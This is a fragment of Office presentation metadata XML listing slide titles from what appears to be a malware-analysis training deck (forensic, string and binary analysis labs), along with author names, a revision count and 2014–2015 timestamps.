      <vt:lpstr>Basics of malware: forensic analysis lab</vt:lpstr>
      <vt:lpstr>Basics of malware: string analysis lab</vt:lpstr>
      <vt:lpstr>Basics of malware: string analysis lab</vt:lpstr>
      <vt:lpstr>Basics of malware: binary analysis lab</vt:lpstr>
      <vt:lpstr>Questions?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dc:title>
  <dc:creator>Ram Venugopalan</dc:creator>
  <cp:lastModifiedBy>Christiaan Beek</cp:lastModifiedBy>
  <cp:revision>448</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-09T22:18:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-08T00:40:12Z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7175da32-41b2-479a-867d-d45ff71d4924</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x0101002CB21D7AA4670B4495BF272958E67C9B</vt:lpwstr>
  </property>
</Properties>
</file>